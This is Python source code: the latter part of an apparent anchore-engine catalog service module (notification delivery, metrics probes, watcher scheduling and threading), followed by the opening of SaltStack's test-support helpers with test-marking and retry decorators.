                    qobj['userId'] = userId
                    qobj['imageDigest'] = image_record['imageDigest']
                    qobj['manifest'] = manifest
                    try:
                        if not q_client.is_inqueue('images_to_analyze', qobj):
                            # queue image for analysis
                            logger.debug("queued image for analysis: " + str(imageDigest))
                            qobj = q_client.enqueue('images_to_analyze', qobj)
                            # set the appropriate analysis state for image
                            # image_record['analysis_status'] = taskstate.queued_state('analyze')
                            # image_record['analysis_status'] = taskstate.working_state('analyze')
                            # with db.session_scope() as dbsession:
                            #     rc = db.db_catalog_image.update_record(image_record, session=dbsession)
                        else:
                            logger.debug("image already queued")
                    except Exception as err:
                        logger.error("failed to check/queue image for analysis - exception: " + str(err))
    logger.debug("FIRING DONE: " + str(watcher))
    try:
        kwargs['mythread']['last_return'] = handler_success
    except:
        pass
    # record runtime metrics for this watcher pass
    if anchore_engine.subsys.metrics.is_enabled() and handler_success:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="success")
    else:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="fail")
    return (True)
def handle_notifications(*args, **kwargs):
    """
    Periodic watcher: drain each per-subscription-type simplequeue of pending
    notifications, persist deliverable ones into the DB-backed notification
    queue, then attempt delivery of everything stored there, with bounded retry.

    :param kwargs: expects kwargs['mythread'] with 'taskType' and 'last_return'
    :return: True (always; failures are logged, not raised)
    """
    global system_user_auth
    watcher = str(kwargs['mythread']['taskType'])
    handler_success = True
    timer = time.time()
    logger.debug("FIRING: " + str(watcher))
    q_client = internal_client_for(SimpleQueueClient, userId=None)
    with db.session_scope() as dbsession:
        mgr = manager_factory.for_session(dbsession)
        localconfig = anchore_engine.configuration.localconfig.get_config()
        # retry window (seconds) for failed webhook deliveries; default 30
        try:
            notification_timeout = int(localconfig['webhooks']['notification_retry_timeout'])
        except:
            notification_timeout = 30
        logger.debug("notification timeout: " + str(notification_timeout))
        # get the event log notification config
        try:
            event_log_config = localconfig.get('services', {}).get('catalog', {}).get('event_log', None)
            if event_log_config and 'notification' in event_log_config:
                notify_events = event_log_config.get('notification').get('enabled', False)
                if notify_events and 'level' in event_log_config.get('notification'):
                    event_levels = event_log_config.get('notification').get('level')
                    event_levels = [level.lower() for level in event_levels]
                else:
                    # None means "notify for all levels"
                    event_levels = None
            else:
                notify_events = False
                event_levels = None
        except:
            logger.exception('Ignoring errors parsing for event_log configuration')
            notify_events = False
            event_levels = None
        # regular event queue notifications + event log notification
        event_log_type = 'event_log'
        for subscription_type in anchore_engine.common.subscription_types + [event_log_type]:
            logger.debug("notifier: " + subscription_type)
            accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
            try:
                qlen = q_client.qlen(subscription_type)
            except Exception as err:
                logger.debug(
                    "problem looking for notifications in queue: " + str(subscription_type) + " - exception: " + str(
                        err))
                qlen = 0
            # phase 1: drain the simplequeue into the DB-backed notification queue
            while (qlen > 0):
                pupdate_record = q_client.dequeue(subscription_type)
                if pupdate_record:
                    logger.debug("got notification from queue: " + json.dumps(pupdate_record, indent=4))
                    notification = pupdate_record['data']
                    userId = notification['userId']
                    subscription_key = notification['subscription_key']
                    notificationId = notification['notificationId']
                    for account in accounts:
                        try:
                            if userId == account['name']:
                                notification_record = None
                                if subscription_type in anchore_engine.common.subscription_types:
                                    # only store when the account has a matching active subscription
                                    dbfilter = {'subscription_type': subscription_type,
                                                'subscription_key': subscription_key}
                                    subscription_records = db_subscriptions.get_byfilter(account['name'],
                                                                                         session=dbsession, **dbfilter)
                                    if subscription_records:
                                        subscription = subscription_records[0]
                                        if subscription and subscription['active']:
                                            notification_record = notifications.make_notification(account,
                                                                                                  subscription_type,
                                                                                                  notification)
                                elif subscription_type == event_log_type: # handle event_log differently since its not a type of subscriptions
                                    if notify_events and (
                                            event_levels is None or subscription_key.lower() in event_levels):
                                        notification.pop('subscription_key',
                                                         None) # remove subscription_key property from notification
                                        notification_record = notifications.make_notification(account, subscription_type,
                                                                                              notification)
                                if notification_record:
                                    logger.spew("Storing NOTIFICATION: " + str(account) + str(notification_record))
                                    db_queues.add(subscription_type, userId, notificationId, notification_record, 0,
                                                  int(time.time() + notification_timeout), session=dbsession)
                        except Exception as err:
                            import traceback
                            traceback.print_exc()
                            logger.warn("cannot store notification to DB - exception: " + str(err))
                qlen = q_client.qlen(subscription_type)
            # phase 2: attempt delivery of everything stored, dropping past-deadline entries
            for account in accounts:
                notification_records = db_queues.get_all(subscription_type, account['name'], session=dbsession)
                for notification_record in notification_records:
                    logger.debug("drained to send: " + json.dumps(notification_record))
                    try:
                        rc = notifications.notify(account, notification_record)
                        if rc:
                            db_queues.delete_record(notification_record, session=dbsession)
                    except Exception as err:
                        logger.debug("failed to send notification, storing for retry - exception: " + str(err))
                        # 'tries' holds the timestamp of the last attempt; compared
                        # against the 'max_tries' deadline set at enqueue time
                        notification_record['tries'] = int(time.time())
                        if notification_record['tries'] > notification_record['max_tries']:
                            logger.error("hit max notification timeout: dropping notificaion")
                            db_queues.delete_record(notification_record, session=dbsession)
                        else:
                            db_queues.update_record(notification_record, session=dbsession)
    logger.debug("FIRING DONE: " + str(watcher))
    try:
        kwargs['mythread']['last_return'] = handler_success
    except:
        pass
    # record runtime metrics for this watcher pass
    if anchore_engine.subsys.metrics.is_enabled() and handler_success:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="success")
    else:
        anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
                                                      function=watcher, status="fail")
    return (True)
def handle_metrics(*args, **kwargs):
    """
    Looping watcher thread: periodically exercise DB read/write/read-write
    probes and a tmp-dir free-space probe, publishing the timings/values to
    the metrics subsystem. Never returns; sleeps cycle_timer seconds per pass.

    :param kwargs: expects kwargs['mythread']['cycle_timer'] (seconds between passes)
    """
    cycle_timer = kwargs['mythread']['cycle_timer']
    while (True):
        # perform some DB read/writes for metrics gathering
        if anchore_engine.subsys.metrics.is_enabled():
            # DB probes
            anchore_record = None
            try:
                with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_read_seconds").time() as mtimer:
                    with db.session_scope() as dbsession:
                        anchore_record = db_anchore.get(session=dbsession)
            except Exception as err:
                logger.warn("unable to perform DB read probe - exception: " + str(err))
            # write probes only run when the read probe produced a record
            if anchore_record:
                try:
                    with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_write_seconds").time() as mtimer:
                        with db.session_scope() as dbsession:
                            anchore_record['record_state_val'] = str(time.time())
                            rc = db_anchore.update_record(anchore_record, session=dbsession)
                except Exception as err:
                    logger.warn("unable to perform DB write probe - exception: " + str(err))
                try:
                    with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_readwrite_seconds").time() as mtimer:
                        with db.session_scope() as dbsession:
                            anchore_record = db_anchore.get(session=dbsession)
                            anchore_record['record_state_val'] = str(time.time())
                            rc = db_anchore.update_record(anchore_record, session=dbsession)
                except Exception as err:
                    logger.warn("unable to perform DB read/write probe - exception: " + str(err))
            # FS probes
            localconfig = anchore_engine.configuration.localconfig.get_config()
            try:
                tmpdir = localconfig['tmp_dir']
                svfs = os.statvfs(tmpdir)
                available_bytes = svfs.f_bsize * svfs.f_bavail
                anchore_engine.subsys.metrics.gauge_set("anchore_tmpspace_available_bytes", available_bytes)
            except Exception as err:
                logger.warn("unable to detect available bytes probe - exception: " + str(err))
        time.sleep(cycle_timer)
def handle_archive_tasks(*args, **kwargs):
    """
    Periodic processor for analysis-archive transition rules.

    Finds every account that has at least one ArchiveTransitionRule configured
    and runs an ArchiveTransitionTask for it. Task failures are logged and do
    not stop the cycle.

    :param args: unused
    :param kwargs: expects kwargs['mythread']['taskType'] for logging
    :return: True (always, so the scheduler keeps firing this handler)
    """
    watcher = str(kwargs['mythread']['taskType'])
    handler_success = True
    start_time = time.time()
    logger.debug("FIRING: " + str(watcher))
    task_id = None
    try:
        logger.info('Starting analysis archive transition rule processor')
        with db.session_scope() as session:
            # Distinct account names that have at least one transition rule
            rule_accounts = session.query(ArchiveTransitionRule.account).distinct(ArchiveTransitionRule.account).all()
            if rule_accounts:
                rule_accounts = [row[0] for row in rule_accounts]
            logger.debug('Found accounts {} with transition rules'.format(rule_accounts))
            for account_name in rule_accounts:
                task = archiver.ArchiveTransitionTask(account_name)
                task_id = task.task_id
                logger.info('Starting archive transition task {} for account {}'.format(task.task_id, account_name))
                task.run()
                logger.info('Archive transition task {} complete'.format(task.task_id))
    except Exception:
        logger.exception('Caught unexpected exception')
    finally:
        logger.debug('Analysis archive task {} execution time: {} seconds'.format(task_id, time.time() - start_time))
        logger.debug('Sleeping until next cycle since no messages to process')
    return True
# --- module-level state shared by the monitor/watcher machinery below ---
click = 0  # startup countdown: monitor_func delays real work for its first 5 invocations
running = False  # read by monitor_func as an "already in a pass" guard; reset in its finally block
last_run = 0  # epoch seconds of the last completed monitor_func pass (rate limiting vs kick_timer)
system_user_auth = ('anchore-system', '')  # placeholder; replaced from localconfig in monitor_func
# policy update check data
feed_sync_updated = False  # read by check_feedmeta_update
bundle_user_last_updated = {}  # userId -> 'last_updated' of that user's active policy bundle
bundle_user_is_updated = {}
default_lease_ttl = 60 # lease ttl passed to run_target_with_lease; NOTE(review): prior comment said "1 hour" but the value is 60 — presumably seconds; confirm intended unit
def watcher_func(*args, **kwargs):
    """
    Generic watcher-task consumer thread: loop forever, dequeue tasks from the
    'watcher_tasks' simplequeue, and invoke the matching handler from the
    module-level watchers table — under a distributed lease when the watcher
    defines a task_lease_id, otherwise directly. Never returns.

    :param args: unused (rebound inside the loop for the handler call)
    :param kwargs: unused (rebound inside the loop for the handler call)
    """
    global system_user_auth
    while (True):
        logger.debug("starting generic watcher")
        all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
        if not all_ready:
            logger.info("simplequeue service not yet ready, will retry")
        else:
            q_client = internal_client_for(SimpleQueueClient, userId=None)
            lease_id = None
            try:
                logger.debug("attempting dequeue")
                qobj = q_client.dequeue('watcher_tasks', max_wait_seconds=30)
                logger.debug("dequeue complete")
                if qobj:
                    logger.debug("got task from queue: " + str(qobj))
                    watcher = qobj['data']['watcher']
                    handler = watchers[watcher]['handler']
                    # rebind args/kwargs for the handler call (shadows this function's own)
                    args = []
                    kwargs = {'mythread': watchers[watcher]}
                    lease_id = watchers[watcher]['task_lease_id']
                    # Old way
                    timer = time.time()
                    if not lease_id:
                        logger.debug(
                            'No task lease defined for watcher {}, initiating without lock protection'.format(watcher))
                        rc = handler(*args, **kwargs)
                    else:
                        # run under a simplequeue lease so only one catalog process executes this task
                        rc = simplequeue.run_target_with_lease(system_user_auth, lease_id, handler,
                                                               ttl=default_lease_ttl, *args, **kwargs)
                else:
                    logger.debug("nothing in queue")
            except (simplequeue.LeaseAcquisitionFailedError, simplequeue.LeaseUnavailableError) as e:
                logger.debug('Lease acquisition could not complete, but this is probably due to another process with the lease: {}'.format(e))
            except Exception as err:
                logger.warn("failed to process task this cycle: " + str(err))
        logger.debug("generic watcher done")
        time.sleep(5)
def schedule_watcher(watcher):
    """
    Enqueue a one-shot task onto the 'watcher_tasks' simplequeue for the named
    watcher, unless an identical task is already queued.

    :param watcher: key into the module-level watchers table
    :return: False when the watcher name is unknown, True otherwise (including
             enqueue failures, which are only logged)
    """
    if watcher not in watchers:
        logger.warn("input watcher {} not in list of available watchers {}".format(watcher, list(watchers.keys())))
        return False
    watcher_config = watchers[watcher]
    # only watchers with a taskType run through the generic task queue
    if watcher_config['taskType']:
        logger.debug("should queue job: " + watcher)
        task = copy.deepcopy(watcher_task_template)
        task['watcher'] = watcher
        task['taskType'] = watcher_config['taskType']
        try:
            queue_client = internal_client_for(SimpleQueueClient, userId=None)
            if queue_client.is_inqueue('watcher_tasks', task):
                logger.debug(str(task) + ": init task already queued")
            else:
                queued_obj = queue_client.enqueue('watcher_tasks', task)
                logger.debug(str(task) + ": init task queued: " + str(queued_obj))
            watcher_config['last_queued'] = time.time()
        except Exception as err:
            logger.warn("failed to enqueue watcher task: " + str(err))
    return True
def monitor_func(**kwargs):
    """
    One pass of the catalog monitor: after a 5-tick startup delay, apply any
    configured per-watcher cycle timers (clamped to min/max), start a thread per
    watcher (a generic watcher_func consumer for task-type watchers, or the
    handler itself for looping watchers), and schedule any watcher whose cycle
    timer has elapsed.

    :param kwargs: expects 'kick_timer' (min seconds between passes) and
                   optionally 'cycle_timers' (per-watcher overrides)
    :return: True on the early-exit paths; None after a full pass
    """
    global click, running, last_queued, system_user_auth, watchers, last_run
    # startup delay: skip the first 5 invocations entirely
    if click < 5:
        click = click + 1
        logger.debug("Catalog monitor starting in: " + str(5 - click))
        return (True)
    # NOTE(review): 'running' is read here but never set True in this file — the
    # guard appears ineffective as written; confirm whether it is set elsewhere
    if running or ((time.time() - last_run) < kwargs['kick_timer']):
        return (True)
    logger.debug("FIRING: catalog_monitor")
    try:
        localconfig = anchore_engine.configuration.localconfig.get_config()
        system_user_auth = localconfig['system_user_auth']
        for watcher in list(watchers.keys()):
            if not watchers[watcher]['initialized']:
                # first time
                if 'cycle_timers' in kwargs and watcher in kwargs['cycle_timers']:
                    try:
                        the_cycle_timer = watchers[watcher]['cycle_timer']
                        min_cycle_timer = watchers[watcher]['min_cycle_timer']
                        max_cycle_timer = watchers[watcher]['max_cycle_timer']
                        config_cycle_timer = int(kwargs['cycle_timers'][watcher])
                        # negative configured value bypasses the min/max clamping
                        if config_cycle_timer < 0:
                            the_cycle_timer = abs(int(config_cycle_timer))
                        elif config_cycle_timer < min_cycle_timer:
                            logger.warn("configured cycle timer for handler (" + str(
                                watcher) + ") is less than the allowed min (" + str(
                                min_cycle_timer) + ") - using allowed min")
                            the_cycle_timer = min_cycle_timer
                        elif config_cycle_timer > max_cycle_timer:
                            logger.warn("configured cycle timer for handler (" + str(
                                watcher) + ") is greater than the allowed max (" + str(
                                max_cycle_timer) + ") - using allowed max")
                            the_cycle_timer = max_cycle_timer
                        else:
                            the_cycle_timer = config_cycle_timer
                        watchers[watcher]['cycle_timer'] = the_cycle_timer
                    except Exception as err:
                        logger.warn(
                            "exception setting custom cycle timer for handler (" + str(watcher) + ") - using default")
                watchers[watcher]['initialized'] = True
            if watcher not in watcher_threads:
                if watchers[watcher]['taskType']:
                    # spin up a generic task watcher
                    logger.debug("starting generic task thread")
                    watcher_threads[watcher] = threading.Thread(target=watcher_func, args=[watcher], kwargs={})
                    watcher_threads[watcher].start()
                else:
                    # spin up a specific looping watcher thread
                    watcher_threads[watcher] = threading.Thread(target=watchers[watcher]['handler'],
                                                                args=watchers[watcher]['args'],
                                                                kwargs={'mythread': watchers[watcher]})
                    watcher_threads[watcher].start()
            all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
            if not all_ready:
                logger.info("simplequeue service not yet ready, will retry")
            elif time.time() - watchers[watcher]['last_queued'] > watchers[watcher]['cycle_timer']:
                rc = schedule_watcher(watcher)
    except Exception as err:
        logger.error(str(err))
    finally:
        logger.debug("FIRING DONE: catalog_monitor")
        running = False
        last_run = time.time()
    logger.debug("exiting monitor thread")
# handle of the background thread started by monitor(); None until first start
monitor_thread = None
def monitor(*args, **kwargs):
    """
    Service-framework entry point: ensure exactly one catalog monitor thread is
    running. If the previous monitor_func thread has finished, join it and start
    a fresh one; if it is still alive, do nothing.

    :param args: unused
    :param kwargs: passed through to monitor_func (kick_timer, cycle_timers, ...)
    """
    global monitor_thread
    try:
        donew = False
        if monitor_thread:
            # Thread.isAlive() was removed in Python 3.9; is_alive() is the
            # long-standing equivalent
            if monitor_thread.is_alive():
                logger.spew("MON: thread still running")
            else:
                logger.spew("MON: thread stopped running")
                donew = True
                monitor_thread.join()
                logger.spew("MON: thread joined: isAlive=" + str(monitor_thread.is_alive()))
        else:
            logger.spew("MON: no thread")
            donew = True
        if donew:
            logger.spew("MON: starting")
            monitor_thread = threading.Thread(target=monitor_func, kwargs=kwargs)
            monitor_thread.start()
        else:
            logger.spew("MON: skipping")
    except Exception as err:
        logger.warn("MON thread start exception: " + str(err))
class CatalogService(ApiService):
    """
    Catalog API service: registers the monitor loop defined in this module and
    initializes object storage, the analysis archive, and per-account default
    policy bundles during service startup.
    """
    __service_name__ = 'catalog'
    __spec_dir__ = pkg_resources.resource_filename(__name__, 'swagger')
    # module-level monitor() above drives the watcher scheduling loop
    __monitor_fn__ = monitor
    def _register_instance_handlers(self):
        """Register lifecycle hooks: object storage after DB init, default policies after registration."""
        super()._register_instance_handlers()
        self.register_handler(LifeCycleStages.post_db, self._init_object_storage, {})
        self.register_handler(LifeCycleStages.post_register, self._init_policies, {})
    def _init_object_storage(self):
        """Initialize the primary object store and the analysis archive; re-raise on failure."""
        try:
            did_init = object_store.initialize(self.configuration, manager_id=DEFAULT_OBJECT_STORE_MANAGER_ID, config_keys=[DEFAULT_OBJECT_STORE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY], allow_legacy_fallback=True)
            if not did_init:
                logger.warn('Unexpectedly found the object store already initialized. This is not an expected condition. Continuting with driver: {}'.format(object_store.get_manager().primary_client.__config_name__))
        except Exception as err:
            logger.exception("Error initializing the object store: check catalog configuration")
            raise err
        try:
            archive.initialize(self.configuration)
        except Exception as err:
            logger.exception("Error initializing analysis archive: check catalog configuration")
            raise err
    def _init_policies(self):
        """
        Ensure all accounts have a default policy in place
        :return:
        """
        obj_mgr = object_store.get_manager()
        with db.session_scope() as dbsession:
            mgr = manager_factory.for_session(dbsession)
            for account_dict in mgr.list_accounts(include_service=False):
                try:
                    logger.info('Initializing a new account')
                    userId = account_dict['name'] # Old keys are userId, now that maps to account name
                    bundle_records = db_policybundle.get_all_byuserId(userId, session=dbsession)
                    if not bundle_records:
                        logger.debug("Account {} has no policy bundle - installing default".format(userId))
                        config = self.global_configuration
                        if config.get('default_bundle_file', None) and os.path.exists(config['default_bundle_file']):
                            logger.info("loading def bundle: " + str(config['default_bundle_file']))
                            try:
                                default_bundle = {}
                                with open(config['default_bundle_file'], 'r') as FH:
                                    default_bundle = json.loads(FH.read())
                                if default_bundle:
                                    # store the bundle document, then activate its DB record
                                    bundle_url = obj_mgr.put_document(userId, 'policy_bundles', default_bundle['id'],
                                                                      default_bundle)
                                    policy_record = make_policy_record(userId, default_bundle, active=True)
                                    rc = db_policybundle.add(policy_record['policyId'], userId, True, policy_record,
                                                             session=dbsession)
                                    if not rc:
                                        raise Exception("policy bundle DB add failed")
                            except Exception as err:
                                # IntegrityError means another catalog process won the init race
                                if isinstance(err, IntegrityError):
                                    logger.warn("another process has already initialized, continuing")
                                else:
                                    logger.error("could not load up default bundle for user - exception: " + str(err))
                except Exception as err:
                    if isinstance(err, IntegrityError):
                        logger.warn("another process has already initialized, continuing")
                    else:
                        raise Exception("unable to initialize default user data - exception: " + str(err))
# Background watcher table, keyed by watcher name. Each config dict holds:
#   handler         - callable invoked when the watcher fires
#   task_lease_id   - distributed lease name (False = no lease used)
#   taskType        - task type string for queued execution (None = inline)
#   args            - positional arguments passed to the handler
#   cycle_timer     - seconds between runs, bounded by min/max_cycle_timer
#   last_queued     - epoch time the watcher last fired (0 = never)
#   last_return     - most recent handler result
#   initialized     - True once the watcher's configuration has been applied
watchers = {
    'image_watcher': {
        'handler': handle_image_watcher,
        'task_lease_id': 'image_watcher',
        'taskType': 'handle_image_watcher',
        'args': [],
        'cycle_timer': 600,
        'min_cycle_timer': 300,
        'max_cycle_timer': 86400 * 7,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'repo_watcher': {
        'handler': handle_repo_watcher,
        'task_lease_id': 'repo_watcher',
        'taskType': 'handle_repo_watcher',
        'args': [],
        'cycle_timer': 60,
        'min_cycle_timer': 60,
        'max_cycle_timer': 86400 * 7,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'policy_eval': {
        'handler': handle_policyeval,
        'task_lease_id': 'policy_eval',
        'taskType': 'handle_policyeval',
        'args': [],
        'cycle_timer': 300,
        'min_cycle_timer': 60,
        'max_cycle_timer': 86400 * 2,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'analyzer_queue': {
        'handler': handle_analyzer_queue,
        'task_lease_id': 'analyzer_queue',
        'taskType': 'handle_analyzer_queue',
        'args': [],
        'cycle_timer': 5,
        'min_cycle_timer': 1,
        'max_cycle_timer': 7200,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'notifications': {
        'handler': handle_notifications,
        'task_lease_id': 'notifications',
        'taskType': 'handle_notifications',
        'args': [],
        'cycle_timer': 10,
        'min_cycle_timer': 10,
        'max_cycle_timer': 86400 * 2,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'vulnerability_scan': {
        'handler': handle_vulnerability_scan,
        'task_lease_id': 'vulnerability_scan',
        'taskType': 'handle_vulnerability_scan',
        'args': [],
        'cycle_timer': 300,
        'min_cycle_timer': 60,
        'max_cycle_timer': 86400 * 2,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'account_resource_cleanup': {
        'handler': handle_account_resource_cleanup,
        'task_lease_id': 'account_resource_cleanup',
        'taskType': 'handle_account_resource_cleanup',
        'args': [],
        'cycle_timer': 30,
        'min_cycle_timer': 30,
        'max_cycle_timer': 30,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'service_watcher': {
        'handler': handle_service_watcher,
        'task_lease_id': False,
        'taskType': None,
        'args': [],
        'cycle_timer': 10,
        'min_cycle_timer': 1,
        'max_cycle_timer': 300,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'service_heartbeat': {
        'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat,
        'task_lease_id': False,
        'taskType': None,
        'args': [CatalogService.__service_name__],
        'cycle_timer': 60,
        'min_cycle_timer': 60,
        'max_cycle_timer': 60,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'handle_metrics': {
        'handler': handle_metrics,
        'task_lease_id': False,
        'taskType': None,
        'args': [],
        'cycle_timer': 60,
        'min_cycle_timer': 60,
        'max_cycle_timer': 60,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
    'archive_tasks': {
        'handler': handle_archive_tasks,
        'task_lease_id': 'archive_transitions',
        'taskType': 'handle_archive_tasks',
        'args': [],
        'cycle_timer': 43200,
        'min_cycle_timer': 60,
        'max_cycle_timer': 86400 * 5,
        'last_queued': 0,
        'last_return': False,
        'initialized': False,
    },
}
# Skeleton for messages a watcher places on the task queue; 'taskType' and
# 'watcher' are filled in per dispatch.
watcher_task_template = {
    'taskType': None,
    'watcher': None,
}
# Watcher name -> thread handle for handler threads spawned by the monitor.
watcher_threads = {}
|
helpers.py | """
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
"""
import base64
import errno
import fnmatch
import functools
import inspect
import logging
import os
import random
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import types
from contextlib import contextmanager
import pytest
import salt.ext.tornado.ioloop
import salt.ext.tornado.web
import salt.utils.files
import salt.utils.platform
import salt.utils.pycrypto
import salt.utils.stringutils
import salt.utils.versions
from salt.ext import six
from salt.ext.six.moves import builtins
from saltfactories.exceptions import FactoryFailure as ProcessFailed
from saltfactories.utils.ports import get_unused_localhost_port
from saltfactories.utils.processes import ProcessResult
from tests.support.mock import patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.sminion import create_sminion
from tests.support.unit import SkipTest, _id, skip
log = logging.getLogger(__name__)
# Cached result of the git ``core.symlinks`` probe performed by
# no_symlinks(); None means "not probed yet".
HAS_SYMLINKS = None
# Tests skipped before the pytest migration stay skipped unless
# PRE_PYTEST_DONT_SKIP is exported in the environment.
PRE_PYTEST_SKIP_OR_NOT = "PRE_PYTEST_DONT_SKIP" not in os.environ
PRE_PYTEST_SKIP_REASON = (
    "PRE PYTEST - This test was skipped before running under pytest"
)
PRE_PYTEST_SKIP = pytest.mark.skipif(
    PRE_PYTEST_SKIP_OR_NOT, reason=PRE_PYTEST_SKIP_REASON
)
# True when running on Python 3.5 or older.
ON_PY35 = sys.version_info < (3, 6)
def no_symlinks():
    """
    Check if git is installed and has symlinks enabled in the configuration.

    Returns True when symlink-based tests should be skipped (git missing or
    ``core.symlinks`` not ``true``). The probe result is cached in the
    module-level ``HAS_SYMLINKS``.
    """
    global HAS_SYMLINKS
    if HAS_SYMLINKS is not None:
        return not HAS_SYMLINKS
    output = ""
    try:
        output = subprocess.Popen(
            ["git", "config", "--get", "core.symlinks"],
            cwd=RUNTIME_VARS.TMP,
            stdout=subprocess.PIPE,
        ).communicate()[0]
    except OSError as exc:
        if exc.errno != errno.ENOENT:
            raise
    except subprocess.CalledProcessError:
        # git returned non-zero status
        pass
    # communicate() returns bytes (the pipe is not opened in text mode), and
    # on Python 3 ``bytes == str`` is always False -- decode first so the
    # comparison below can ever succeed.
    if isinstance(output, bytes):
        output = output.decode("utf-8", "replace")
    HAS_SYMLINKS = False
    if output.strip() == "true":
        HAS_SYMLINKS = True
    return not HAS_SYMLINKS
def destructiveTest(caller):
    """
    Mark a test case as a destructive test for example adding or removing users
    from your system.
    .. code-block:: python
        class MyTestCase(TestCase):
            @destructiveTest
            def test_create_user(self):
                pass
    """
    caller.__destructive_test__ = True
    if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() != "false":
        # Destructive tests are enabled -- leave the test callable untouched.
        return caller
    reason = "Destructive tests are disabled"
    if not isinstance(caller, type):

        @functools.wraps(caller)
        def skip_wrapper(*args, **kwargs):
            raise SkipTest(reason)

        caller = skip_wrapper
    caller.__unittest_skip__ = True
    caller.__unittest_skip_why__ = reason
    return caller
def expensiveTest(caller):
    """
    Mark a test case as an expensive test, for example, a test which can cost
    money(Salt's cloud provider tests).
    .. code-block:: python
        class MyTestCase(TestCase):
            @expensiveTest
            def test_create_user(self):
                pass
    """
    caller.__expensive_test__ = True
    if os.environ.get("EXPENSIVE_TESTS", "False").lower() != "false":
        # Expensive tests are enabled -- leave the test callable untouched.
        return caller
    reason = "Expensive tests are disabled"
    if not isinstance(caller, type):

        @functools.wraps(caller)
        def skip_wrapper(*args, **kwargs):
            raise SkipTest(reason)

        caller = skip_wrapper
    caller.__unittest_skip__ = True
    caller.__unittest_skip_why__ = reason
    return caller
def slowTest(caller):
    """
    Mark a test case as a slow test.
    .. code-block:: python
        class MyTestCase(TestCase):
            @slowTest
            def test_that_takes_much_time(self):
                pass
    """
    # Pure marker decorator: tags the callable and returns it unchanged.
    caller.__slow_test__ = True
    return caller
def flaky(caller=None, condition=True, attempts=4):
    """
    Mark a test as flaky. The test will attempt to run up to ``attempts``
    times (4 by default), looking for a successful run. After an immediate
    second try, it will use an exponential backoff starting with one second.
    .. code-block:: python
        class MyTestCase(TestCase):
            @flaky
            def test_sometimes_works(self):
                pass
    """
    if caller is None:
        # Used as ``@flaky(condition=..., attempts=...)``: return the
        # parameterized decorator.
        return functools.partial(flaky, condition=condition, attempts=attempts)
    if isinstance(condition, bool) and condition is False:
        # Don't even decorate
        return caller
    elif callable(condition):
        if condition() is False:
            # Don't even decorate
            return caller
    if inspect.isclass(caller):
        # Applied to a class: decorate every test_* method individually.
        attrs = [n for n in dir(caller) if n.startswith("test_")]
        for attrname in attrs:
            try:
                function = getattr(caller, attrname)
                if not inspect.isfunction(function) and not inspect.ismethod(function):
                    continue
                setattr(
                    caller,
                    attrname,
                    flaky(caller=function, condition=condition, attempts=attempts),
                )
            except Exception as exc:  # pylint: disable=broad-except
                log.exception(exc)
                continue
        return caller
    @functools.wraps(caller)
    def wrap(cls):
        # Retry loop: re-run setUp before retries, tearDown after failures,
        # and re-raise the last failure once attempts are exhausted.
        for attempt in range(0, attempts):
            try:
                if attempt > 0:
                    # Run through setUp again
                    # We only run it after the first iteration(>0) because the regular
                    # test runner will have already ran setUp the first time
                    setup = getattr(cls, "setUp", None)
                    if callable(setup):
                        setup()
                return caller(cls)
            except SkipTest as exc:
                cls.skipTest(exc.args[0])
            except Exception as exc:  # pylint: disable=broad-except
                exc_info = sys.exc_info()
                if isinstance(exc, SkipTest):
                    # NOTE(review): appears unreachable -- SkipTest is already
                    # caught by the clause above; confirm before relying on it.
                    six.reraise(*exc_info)
                if not isinstance(exc, AssertionError) and log.isEnabledFor(
                    logging.DEBUG
                ):
                    log.exception(exc, exc_info=exc_info)
                if attempt >= attempts - 1:
                    # We won't try to run tearDown once the attempts are exhausted
                    # because the regular test runner will do that for us
                    six.reraise(*exc_info)
                # Run through tearDown again
                teardown = getattr(cls, "tearDown", None)
                if callable(teardown):
                    teardown()
                backoff_time = attempt ** 2
                log.info("Found Exception. Waiting %s seconds to retry.", backoff_time)
                time.sleep(backoff_time)
        return cls
    return wrap
def requires_sshd_server(caller):
    """
    Retired marker for tests that need the test-suite SSH daemon.

    This decorator has been replaced by a pytest marker; applying it now
    always fails with instructions for the migration.
    """
    raise RuntimeError(
        "Please replace @requires_sshd_server with @pytest.mark.requires_sshd_server"
    )
class RedirectStdStreams:
    """
    Context manager that temporarily points ``sys.stdout``/``sys.stderr`` at
    arbitrary file-like objects.

    With no arguments both streams are redirected to ``os.devnull``, which
    simply mutes all output while the redirection is active.
    """

    def __init__(self, stdout=None, stderr=None):
        # Late import
        import salt.utils.files

        if stdout is None:
            # pylint: disable=resource-leakage
            stdout = salt.utils.files.fopen(os.devnull, "w")
            # pylint: enable=resource-leakage
        if stderr is None:
            # pylint: disable=resource-leakage
            stderr = salt.utils.files.fopen(os.devnull, "w")
            # pylint: enable=resource-leakage
        self.__stdout = stdout
        self.__stderr = stderr
